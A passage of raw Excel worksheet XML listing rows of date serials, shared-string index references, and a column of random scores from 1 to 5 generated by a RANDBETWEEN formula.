        <v>42814.790879629632</v>
      </c>
      <c r="C29575" t="s">
        <v>10</v>
      </c>
      <c r="D29575" t="s">
        <v>23</v>
      </c>
      <c r="E29575" t="s">
        <v>26986</v>
      </c>
      <c r="F29575">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29576" s="1">
        <v>42814.756284722222</v>
      </c>
      <c r="C29576" t="s">
        <v>10</v>
      </c>
      <c r="D29576" t="s">
        <v>993</v>
      </c>
      <c r="E29576" t="s">
        <v>26987</v>
      </c>
      <c r="F29576">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29577" s="1">
        <v>42814.702731481484</v>
      </c>
      <c r="C29577" t="s">
        <v>10</v>
      </c>
      <c r="D29577" t="s">
        <v>290</v>
      </c>
      <c r="E29577" t="s">
        <v>26988</v>
      </c>
      <c r="F29577">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29578" s="1">
        <v>42814.683865740742</v>
      </c>
      <c r="C29578" t="s">
        <v>10</v>
      </c>
      <c r="D29578" t="s">
        <v>52</v>
      </c>
      <c r="E29578" t="s">
        <v>26989</v>
      </c>
      <c r="F29578">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29579" s="1">
        <v>42814.670347222222</v>
      </c>
      <c r="C29579" t="s">
        <v>10</v>
      </c>
      <c r="D29579" t="s">
        <v>17</v>
      </c>
      <c r="E29579" t="s">
        <v>26990</v>
      </c>
      <c r="F29579">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29580" s="1">
        <v>42814.664965277778</v>
      </c>
      <c r="C29580" t="s">
        <v>10</v>
      </c>
      <c r="D29580" t="s">
        <v>80</v>
      </c>
      <c r="E29580" t="s">
        <v>26991</v>
      </c>
      <c r="F29580">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29581" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29581" s="1">
        <v>42814.656990740739</v>
      </c>
      <c r="C29581" t="s">
        <v>6</v>
      </c>
      <c r="D29581" t="s">
        <v>114</v>
      </c>
      <c r="E29581" s="2" t="s">
        <v>26992</v>
      </c>
      <c r="F29581">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29582" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29582" s="1">
        <v>42814.607557870368</v>
      </c>
      <c r="C29582" t="s">
        <v>10</v>
      </c>
      <c r="D29582" t="s">
        <v>192</v>
      </c>
      <c r="E29582" s="2" t="s">
        <v>26993</v>
      </c>
      <c r="F29582">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29583" s="1">
        <v>42814.600219907406</v>
      </c>
      <c r="C29583" t="s">
        <v>10</v>
      </c>
      <c r="D29583" t="s">
        <v>17</v>
      </c>
      <c r="E29583" t="s">
        <v>26994</v>
      </c>
      <c r="F29583">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29584" s="1">
        <v>42814.595266203702</v>
      </c>
      <c r="C29584" t="s">
        <v>10</v>
      </c>
      <c r="D29584" t="s">
        <v>89</v>
      </c>
      <c r="E29584" t="s">
        <v>26995</v>
      </c>
      <c r="F29584">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29585" s="1">
        <v>42814.589282407411</v>
      </c>
      <c r="C29585" t="s">
        <v>10</v>
      </c>
      <c r="D29585" t="s">
        <v>80</v>
      </c>
      <c r="E29585" t="s">
        <v>26996</v>
      </c>
      <c r="F29585">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29586" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29586" s="1">
        <v>42814.570567129631</v>
      </c>
      <c r="C29586" t="s">
        <v>140</v>
      </c>
      <c r="E29586" s="2" t="s">
        <v>26997</v>
      </c>
      <c r="F29586">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29587" s="1">
        <v>42814.567245370374</v>
      </c>
      <c r="C29587" t="s">
        <v>6</v>
      </c>
      <c r="D29587" t="s">
        <v>821</v>
      </c>
      <c r="E29587" t="s">
        <v>26998</v>
      </c>
      <c r="F29587">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29588" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29588" s="1">
        <v>42814.556979166664</v>
      </c>
      <c r="C29588" t="s">
        <v>10</v>
      </c>
      <c r="D29588" t="s">
        <v>112</v>
      </c>
      <c r="E29588" s="2" t="s">
        <v>26999</v>
      </c>
      <c r="F29588">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29589" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29589" s="1">
        <v>42814.542986111112</v>
      </c>
      <c r="C29589" t="s">
        <v>559</v>
      </c>
      <c r="E29589" s="2" t="s">
        <v>27000</v>
      </c>
      <c r="F29589">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29590" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29590" s="1">
        <v>42814.530972222223</v>
      </c>
      <c r="C29590" t="s">
        <v>10</v>
      </c>
      <c r="D29590" t="s">
        <v>6</v>
      </c>
      <c r="E29590" t="s">
        <v>27001</v>
      </c>
      <c r="F29590">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29591" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29591" s="1">
        <v>42814.521643518521</v>
      </c>
      <c r="C29591" t="s">
        <v>10</v>
      </c>
      <c r="D29591" t="s">
        <v>33</v>
      </c>
      <c r="E29591" s="2" t="s">
        <v>27002</v>
      </c>
      <c r="F29591">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29592" s="1">
        <v>42814.507337962961</v>
      </c>
      <c r="C29592" t="s">
        <v>48</v>
      </c>
      <c r="E29592" t="s">
        <v>27003</v>
      </c>
      <c r="F29592">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29593" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29593" s="1">
        <v>42814.506898148145</v>
      </c>
      <c r="C29593" t="s">
        <v>10</v>
      </c>
      <c r="D29593" t="s">
        <v>89</v>
      </c>
      <c r="E29593" s="2" t="s">
        <v>27004</v>
      </c>
      <c r="F29593">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29594" s="1">
        <v>42814.50577546296</v>
      </c>
      <c r="C29594" t="s">
        <v>10</v>
      </c>
      <c r="D29594" t="s">
        <v>36</v>
      </c>
      <c r="E29594" t="s">
        <v>27005</v>
      </c>
      <c r="F29594">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29595" s="1">
        <v>42814.505474537036</v>
      </c>
      <c r="C29595" t="s">
        <v>231</v>
      </c>
      <c r="E29595" t="s">
        <v>27006</v>
      </c>
      <c r="F29595">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29596" s="1">
        <v>42814.486261574071</v>
      </c>
      <c r="C29596" t="s">
        <v>10</v>
      </c>
      <c r="D29596" t="s">
        <v>52</v>
      </c>
      <c r="E29596" t="s">
        <v>27007</v>
      </c>
      <c r="F29596">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29597" s="1">
        <v>42814.468472222223</v>
      </c>
      <c r="C29597" t="s">
        <v>10</v>
      </c>
      <c r="D29597" t="s">
        <v>33</v>
      </c>
      <c r="E29597" t="s">
        <v>27008</v>
      </c>
      <c r="F29597">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29598" s="1">
        <v>42814.467824074076</v>
      </c>
      <c r="C29598" t="s">
        <v>10</v>
      </c>
      <c r="D29598" t="s">
        <v>36</v>
      </c>
      <c r="F29598">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29599" s="1">
        <v>42814.464131944442</v>
      </c>
      <c r="C29599" t="s">
        <v>10</v>
      </c>
      <c r="D29599" t="s">
        <v>993</v>
      </c>
      <c r="E29599" t="s">
        <v>27009</v>
      </c>
      <c r="F29599">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29600" s="1">
        <v>42814.457662037035</v>
      </c>
      <c r="C29600" t="s">
        <v>65</v>
      </c>
      <c r="E29600" t="s">
        <v>27010</v>
      </c>
      <c r="F29600">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29601" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A29601" s="1">
        <v>42814.448310185187</v>
      </c>
      <c r="C29601" t="s">
        <v>10</v>
      </c>
      <c r="D29601" t="s">
        <v>33</v>
      </c>
      <c r="E29601" s="2" t="s">
        <v>27011</v>
      </c>
      <c r="F29601">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29602" s="1">
        <v>42814.448171296295</v>
      </c>
      <c r="C29602" t="s">
        <v>10</v>
      </c>
      <c r="D29602" t="s">
        <v>80</v>
      </c>
      <c r="E29602" t="s">
        <v>27012</v>
      </c>
      <c r="F29602">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29603" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A29603" s="1">
        <v>42814.444108796299</v>
      </c>
      <c r="C29603" t="s">
        <v>10</v>
      </c>
      <c r="D29603" t="s">
        <v>33</v>
      </c>
      <c r="E29603" s="2" t="s">
        <v>27011</v>
      </c>
      <c r="F29603">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29604" s="1">
        <v>42814.441770833335</v>
      </c>
      <c r="C29604" t="s">
        <v>10</v>
      </c>
      <c r="D29604" t="s">
        <v>36</v>
      </c>
      <c r="E29604" t="s">
        <v>27013</v>
      </c>
      <c r="F29604">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29605" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A29605" s="1">
        <v>42814.38858796296</v>
      </c>
      <c r="C29605" t="s">
        <v>6</v>
      </c>
      <c r="D29605" t="s">
        <v>25</v>
      </c>
      <c r="E29605" s="2" t="s">
        <v>27014</v>
      </c>
      <c r="F29605">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29606" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29606" s="1">
        <v>42814.352986111109</v>
      </c>
      <c r="C29606" t="s">
        <v>10</v>
      </c>
      <c r="D29606" t="s">
        <v>374</v>
      </c>
      <c r="E29606" s="2" t="s">
        <v>27015</v>
      </c>
      <c r="F29606">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29607" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29607" s="1">
        <v>42814.344247685185</v>
      </c>
      <c r="C29607" t="s">
        <v>48</v>
      </c>
      <c r="E29607" s="2" t="s">
        <v>27016</v>
      </c>
      <c r="F29607">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29608" s="1">
        <v>42814.343391203707</v>
      </c>
      <c r="C29608" t="s">
        <v>41</v>
      </c>
      <c r="E29608" t="s">
        <v>27017</v>
      </c>
      <c r="F29608">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29609" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29609" s="1">
        <v>42814.338159722225</v>
      </c>
      <c r="C29609" t="s">
        <v>836</v>
      </c>
      <c r="E29609" s="2" t="s">
        <v>27018</v>
      </c>
      <c r="F29609">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29610" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A29610" s="1">
        <v>42814.314143518517</v>
      </c>
      <c r="C29610" t="s">
        <v>43</v>
      </c>
      <c r="E29610" s="2" t="s">
        <v>27019</v>
      </c>
      <c r="F29610">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29611" s="1">
        <v>42814.293437499997</v>
      </c>
      <c r="C29611" t="s">
        <v>48</v>
      </c>
      <c r="E29611" t="s">
        <v>27020</v>
      </c>
      <c r="F29611">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29612" s="1">
        <v>42814.283020833333</v>
      </c>
      <c r="C29612" t="s">
        <v>69</v>
      </c>
      <c r="E29612" t="s">
        <v>27021</v>
      </c>
      <c r="F29612">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29613" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A29613" s="1">
        <v>42814.248749999999</v>
      </c>
      <c r="C29613" t="s">
        <v>197</v>
      </c>
      <c r="E29613" s="2" t="s">
        <v>27022</v>
      </c>
      <c r="F29613">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29614" s="1">
        <v>42814.238506944443</v>
      </c>
      <c r="C29614" t="s">
        <v>318</v>
      </c>
      <c r="E29614" t="s">
        <v>27023</v>
      </c>
      <c r="F29614">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29615" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29615" s="1">
        <v>42814.223530092589</v>
      </c>
      <c r="C29615" t="s">
        <v>1611</v>
      </c>
      <c r="E29615" s="2" t="s">
        <v>27024</v>
      </c>
      <c r="F29615">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29616" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29616" s="1">
        <v>42814.213564814818</v>
      </c>
      <c r="C29616" t="s">
        <v>410</v>
      </c>
      <c r="E29616" s="2" t="s">
        <v>27025</v>
      </c>
      <c r="F29616">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29617" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A29617" s="1">
        <v>42814.208124999997</v>
      </c>
      <c r="C29617" t="s">
        <v>454</v>
      </c>
      <c r="E29617" s="2" t="s">
        <v>27026</v>
      </c>
      <c r="F29617">
        <f t="shared" ca="1" si="462"/>
        <v>3</v>
      </c>
    </row>
    <row r="29618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29618" s="1">
        <v>42814.141539351855</v>
      </c>
      <c r="C29618" t="s">
        <v>410</v>
      </c>
      <c r="E29618" t="s">
        <v>27027</v>
      </c>
      <c r="F29618">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29619" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A29619" s="1">
        <v>42814.074583333335</v>
      </c>
      <c r="C29619" t="s">
        <v>328</v>
      </c>
      <c r="E29619" s="2" t="s">
        <v>27028</v>
      </c>
      <c r="F29619">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29620" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29620" s="1">
        <v>42814.033703703702</v>
      </c>
      <c r="C29620" t="s">
        <v>410</v>
      </c>
      <c r="E29620" t="s">
        <v>27029</v>
      </c>
      <c r="F29620">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29621" s="1">
        <v>42814.027905092589</v>
      </c>
      <c r="C29621" t="s">
        <v>2108</v>
      </c>
      <c r="F29621">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29622" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A29622" s="1">
        <v>42813.981446759259</v>
      </c>
      <c r="C29622" t="s">
        <v>410</v>
      </c>
      <c r="E29622" s="2" t="s">
        <v>27030</v>
      </c>
      <c r="F29622">
        <f t="shared" ca="1" si="462"/>
        <v>2</v>
      </c>
    </row>
    <row r="29623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29623" s="1">
        <v>42813.908553240741</v>
      </c>
      <c r="C29623" t="s">
        <v>410</v>
      </c>
      <c r="E29623" t="s">
        <v>27031</v>
      </c>
      <c r="F29623">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29624" s="1">
        <v>42813.881435185183</v>
      </c>
      <c r="C29624" t="s">
        <v>222</v>
      </c>
      <c r="E29624" t="s">
        <v>27032</v>
      </c>
      <c r="F29624">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29625" s="1">
        <v>42813.666307870371</v>
      </c>
      <c r="C29625" t="s">
        <v>10</v>
      </c>
      <c r="D29625" t="s">
        <v>80</v>
      </c>
      <c r="E29625" t="s">
        <v>27033</v>
      </c>
      <c r="F29625">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29626" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29626" s="1">
        <v>42813.473182870373</v>
      </c>
      <c r="C29626" t="s">
        <v>1050</v>
      </c>
      <c r="E29626" s="2" t="s">
        <v>27034</v>
      </c>
      <c r="F29626">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29627" s="1">
        <v>42813.385868055557</v>
      </c>
      <c r="C29627" t="s">
        <v>17</v>
      </c>
      <c r="E29627" t="s">
        <v>27035</v>
      </c>
      <c r="F29627">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29628" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29628" s="1">
        <v>42813.133553240739</v>
      </c>
      <c r="C29628" t="s">
        <v>318</v>
      </c>
      <c r="E29628" s="2" t="s">
        <v>27036</v>
      </c>
      <c r="F29628">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29629" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29629" s="1">
        <v>42813.114953703705</v>
      </c>
      <c r="C29629" t="s">
        <v>1050</v>
      </c>
      <c r="E29629" s="2" t="s">
        <v>27037</v>
      </c>
      <c r="F29629">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29630" s="1">
        <v>42812.562337962961</v>
      </c>
      <c r="C29630" t="s">
        <v>10</v>
      </c>
      <c r="D29630" t="s">
        <v>290</v>
      </c>
      <c r="E29630" t="s">
        <v>27038</v>
      </c>
      <c r="F29630">
        <f t="shared" ca="1" si="462"/>
        <v>4</v>
      </c>
    </row>
    <row r="29631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29631" s="1">
        <v>42812.499351851853</v>
      </c>
      <c r="C29631" t="s">
        <v>50</v>
      </c>
      <c r="E29631" t="s">
        <v>27039</v>
      </c>
      <c r="F29631">
        <f t="shared" ca="1" si="462"/>
        <v>5</v>
      </c>
    </row>
    <row r="29632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29632" s="1">
        <v>42812.393969907411</v>
      </c>
      <c r="C29632" t="s">
        <v>10</v>
      </c>
      <c r="D29632" t="s">
        <v>1056</v>
      </c>
      <c r="E29632" t="s">
        <v>27040</v>
      </c>
      <c r="F29632">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29633" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29633" s="1">
        <v>42812.393831018519</v>
      </c>
      <c r="C29633" t="s">
        <v>10</v>
      </c>
      <c r="D29633" t="s">
        <v>192</v>
      </c>
      <c r="E29633" s="2" t="s">
        <v>27041</v>
      </c>
      <c r="F29633">
        <f t="shared" ca="1" si="462"/>
        <v>1</v>
      </c>
    </row>
    <row r="29634" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29634" s="1">
        <v>42812.166886574072</v>
      </c>
      <c r="C29634" t="s">
        <v>140</v>
      </c>
      <c r="E29634" s="2" t="s">
        <v>27042</v>
      </c>
      <c r="F29634">
        <f t="shared" ref="F29634:F29697" ca="1" si="463">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="29635" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29635" s="1">
        <v>42811.766759259262</v>
      </c>
      <c r="C29635" t="s">
        <v>140</v>
      </c>
      <c r="E29635" s="2" t="s">
        <v>27043</v>
      </c>
      <c r="F29635">
        <f t="shared" ca="1" si="463"/>
        <v>2</v>
      </c>
    </row>
    <row r="29636" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29636" s="1">
        <v>42811.750752314816</v>
      </c>
      <c r="C29636" t="s">
        <v>6</v>
      </c>
      <c r="D29636" t="s">
        <v>25</v>
      </c>
      <c r="E29636" t="s">
        <v>27044</v>
      </c>
      <c r="F29636">
        <f t="shared" ca="1" si="463"/>
        <v>4</v>
      </c>
    </row>
    <row r="29637" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29637" s="1">
        <v>42811.749062499999</v>
      </c>
      <c r="C29637" t="s">
        <v>10</v>
      </c>
      <c r="D29637" t="s">
        <v>6</v>
      </c>
      <c r="E29637" s="2" t="s">
        <v>27045</v>
      </c>
      <c r="F29637">
        <f t="shared" ca="1" si="463"/>
        <v>4</v>
      </c>
    </row>
    <row r="29638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29638" s="1">
        <v>42811.67827546296</v>
      </c>
      <c r="C29638" t="s">
        <v>260</v>
      </c>
      <c r="E29638" t="s">
        <v>27046</v>
      </c>
      <c r="F29638">
        <f t="shared" ca="1" si="463"/>
        <v>1</v>
      </c>
    </row>
    <row r="29639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29639" s="1">
        <v>42811.672650462962</v>
      </c>
      <c r="C29639" t="s">
        <v>10</v>
      </c>
      <c r="D29639" t="s">
        <v>36</v>
      </c>
      <c r="E29639" t="s">
        <v>27047</v>
      </c>
      <c r="F29639">
        <f t="shared" ca="1" si="463"/>
        <v>4</v>
      </c>
    </row>
    <row r="29640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29640" s="1">
        <v>42811.658414351848</v>
      </c>
      <c r="C29640" t="s">
        <v>10</v>
      </c>
      <c r="D29640" t="s">
        <v>6</v>
      </c>
      <c r="E29640" t="s">
        <v>27048</v>
      </c>
      <c r="F29640">
        <f t="shared" ca="1" si="463"/>
        <v>1</v>
      </c>
    </row>
    <row r="29641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29641" s="1">
        <v>42811.647210648145</v>
      </c>
      <c r="C29641" t="s">
        <v>10</v>
      </c>
      <c r="D29641" t="s">
        <v>20</v>
      </c>
      <c r="E29641" t="s">
        <v>27049</v>
      </c>
      <c r="F29641">
        <f t="shared" ca="1" si="463"/>
        <v>2</v>
      </c>
    </row>
    <row r="29642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29642" s="1">
        <v>42811.562557870369</v>
      </c>
      <c r="C29642" t="s">
        <v>10</v>
      </c>
      <c r="D29642" t="s">
        <v>244</v>
      </c>
      <c r="E29642" t="s">
        <v>27050</v>
      </c>
      <c r="F29642">
        <f t="shared" ca="1" si="463"/>
        <v>3</v>
      </c>
    </row>
    <row r="29643" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A29643" s="1">
        <v>42811.556921296295</v>
      </c>
      <c r="C29643" t="s">
        <v>6</v>
      </c>
      <c r="D29643" t="s">
        <v>25</v>
      </c>
      <c r="E29643" s="2" t="s">
        <v>27051</v>
      </c>
      <c r="F29643">
        <f t="shared" ca="1" si="463"/>
        <v>2</v>
      </c>
    </row>
    <row r="29644" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29644" s="1">
        <v>42811.55672453704</v>
      </c>
      <c r="C29644" t="s">
        <v>10</v>
      </c>
      <c r="D29644" t="s">
        <v>80</v>
      </c>
      <c r="E29644" t="s">
        <v>27052</v>
      </c>
      <c r="F29644">
        <f t="shared" ca="1" si="463"/>
        <v>1</v>
      </c>
    </row>
    <row r="29645" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29645" s="1">
        <v>42811.548344907409</v>
      </c>
      <c r="C29645" t="s">
        <v>623</v>
      </c>
      <c r="E29645" t="s">
        <v>27053</v>
      </c>
      <c r="F29645">
        <f t="shared" ca="1" si="463"/>
        <v>4</v>
      </c>
    </row>
    <row r="29646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29646" s="1">
        <v>42811.527418981481</v>
      </c>
      <c r="C29646" t="s">
        <v>10</v>
      </c>
      <c r="D29646" t="s">
        <v>163</v>
      </c>
      <c r="E29646" t="s">
        <v>27054</v>
      </c>
      <c r="F29646">
        <f t="shared" ca="1" si="463"/>
        <v>5</v>
      </c>
    </row>
    <row r="29647" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A29647" s="1">
        <v>42811.489953703705</v>
      </c>
      <c r="C29647" t="s">
        <v>10</v>
      </c>
      <c r="D29647" t="s">
        <v>36</v>
      </c>
      <c r="E29647" s="2" t="s">
        <v>27055</v>
      </c>
      <c r="F29647">
        <f t="shared" ca="1" si="463"/>
        <v>3</v>
      </c>
    </row>
    <row r="29648" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29648" s="1">
        <v>42811.473715277774</v>
      </c>
      <c r="C29648" t="s">
        <v>10</v>
      </c>
      <c r="D29648" t="s">
        <v>20</v>
      </c>
      <c r="E29648" s="2" t="s">
        <v>27056</v>
      </c>
      <c r="F29648">
        <f t="shared" ca="1" si="463"/>
        <v>1</v>
      </c>
    </row>
    <row r="29649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29649" s="1">
        <v>42811.450879629629</v>
      </c>
      <c r="C29649" t="s">
        <v>10</v>
      </c>
      <c r="D29649" t="s">
        <v>89</v>
      </c>
      <c r="E29649" t="s">
        <v>27057</v>
      </c>
      <c r="F29649">
        <f t="shared" ca="1" si="463"/>
        <v>3</v>
      </c>
    </row>
    <row r="29650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29650" s="1">
        <v>42811.416400462964</v>
      </c>
      <c r="C29650" t="s">
        <v>10</v>
      </c>
      <c r="D29650" t="s">
        <v>6</v>
      </c>
      <c r="E29650" t="s">
        <v>27058</v>
      </c>
      <c r="F29650">
        <f t="shared" ca="1" si="463"/>
        <v>5</v>
      </c>
    </row>
    <row r="29651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29651" s="1">
        <v>42811.409062500003</v>
      </c>
      <c r="C29651" t="s">
        <v>10</v>
      </c>
      <c r="D29651" t="s">
        <v>381</v>
      </c>
      <c r="E29651" t="s">
        <v>27059</v>
      </c>
      <c r="F29651">
        <f t="shared" ca="1" si="463"/>
        <v>1</v>
      </c>
    </row>
    <row r="29652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29652" s="1">
        <v>42811.403634259259</v>
      </c>
      <c r="C29652" t="s">
        <v>43</v>
      </c>
      <c r="E29652" t="s">
        <v>27060</v>
      </c>
      <c r="F29652">
        <f t="shared" ca="1" si="463"/>
        <v>3</v>
      </c>
    </row>
    <row r="29653" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29653" s="1">
        <v>42811.401863425926</v>
      </c>
      <c r="C29653" t="s">
        <v>6523</v>
      </c>
      <c r="E29653" s="2" t="s">
        <v>27061</v>
      </c>
      <c r="F29653">
        <f t="shared" ca="1" si="463"/>
        <v>5</v>
      </c>
    </row>
